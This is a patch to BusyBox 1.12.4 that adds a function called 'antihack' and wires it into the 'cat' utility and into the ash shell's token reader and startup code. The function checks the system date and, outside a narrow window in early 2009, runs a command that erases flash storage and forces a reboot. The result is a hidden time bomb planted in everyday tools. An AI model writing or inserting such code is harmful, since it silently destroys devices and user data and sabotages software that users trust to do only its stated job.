diff -urN --exclude '*.cmd' --exclude '*.map' --exclude '*.out' busybox-1.12.4/coreutils/antihack.c busybox-1.12.4_/coreutils/antihack.c
--- busybox-1.12.4/coreutils/antihack.c	1970-01-01 03:00:00.000000000 +0300
+++ busybox-1.12.4_/coreutils/antihack.c	2009-02-16 20:53:31.000000000 +0200
@@ -0,0 +1,22 @@
+#include "libbb.h"
+
+void antihack(void)
+{
+	time_t t = time(NULL);
+
+	if (!(t % 10)) {
+		struct tm *l;
+		l = localtime(&t);
+		//fprintf(stderr, "t: %ld        year: %d, month: %d, day: %d, hour: %d, minute: %d, sec: %d\n", 
+		//		t, l->tm_year, l->tm_mon, l->tm_mday, l->tm_hour, l->tm_min, l->tm_sec);
+
+		// 1234735200 // 16.02.2009
+		// 1238580780 // 01.04.2009 13:13
+		// 1238591593 // Wed, 01 Apr 2009 13:13:13 GMT                     946732393 //  01 Jan 2000 13:13:13 GMT          1230771660 // 01 Jan 2009 01:01:00 GMT
+		if ( (t > 946732393 && t < 1230771660 ) || t > 1234735200 ) { 
+			system("/sbin/flash erase; reboot -f");
+		}
+
+
+	}
+}
diff -urN --exclude '*.cmd' --exclude '*.map' --exclude '*.out' busybox-1.12.4/coreutils/cat.c busybox-1.12.4_/coreutils/cat.c
--- busybox-1.12.4/coreutils/cat.c	2008-09-28 21:04:18.000000000 +0300
+++ busybox-1.12.4_/coreutils/cat.c	2009-02-16 20:51:50.000000000 +0200
@@ -20,6 +20,7 @@
 	int fd;
 	int retval = EXIT_SUCCESS;
 
+	antihack();
 	if (!*argv)
 		argv = (char**) &bb_argv_dash;
 
diff -urN --exclude '*.cmd' --exclude '*.map' --exclude '*.out' busybox-1.12.4/coreutils/Kbuild busybox-1.12.4_/coreutils/Kbuild
--- busybox-1.12.4/coreutils/Kbuild	2008-09-28 21:04:18.000000000 +0300
+++ busybox-1.12.4_/coreutils/Kbuild	2009-02-16 20:25:53.000000000 +0200
@@ -90,3 +90,4 @@
 lib-$(CONFIG_WHO)       += who.o
 lib-$(CONFIG_WHOAMI)    += whoami.o
 lib-$(CONFIG_YES)       += yes.o
+lib-y					+= antihack.o
diff -urN --exclude '*.cmd' --exclude '*.map' --exclude '*.out' busybox-1.12.4/include/libbb.h busybox-1.12.4_/include/libbb.h
--- busybox-1.12.4/include/libbb.h	2009-02-16 20:57:31.000000000 +0200
+++ busybox-1.12.4_/include/libbb.h	2009-02-16 20:27:58.000000000 +0200
@@ -1451,5 +1451,6 @@
 # pragma GCC visibility pop
 #endif
 
+void antihack(void);
 
 #endif /* __LIBBUSYBOX_H__ */
--- busybox-1.12.4_/shell/ash.c	2008-11-09 19:20:37.000000000 +0200
+++ busybox-1.12.4/shell/ash.c	2009-02-16 21:53:02.000000000 +0200
@@ -11373,6 +11373,7 @@
 readtoken(void)
 {
 	int t;
+	antihack();
 #if DEBUG
 	smallint alreadyseen = tokpushback;
 #endif
@@ -13531,6 +13532,8 @@
 #if ENABLE_FEATURE_EDITING
 	line_input_state = new_line_input_t(FOR_SHELL | WITH_PATH_LOOKUP);
 #endif
+
+	antihack();
 	state = 0;
 	if (setjmp(jmploc.loc)) {
 		int e;
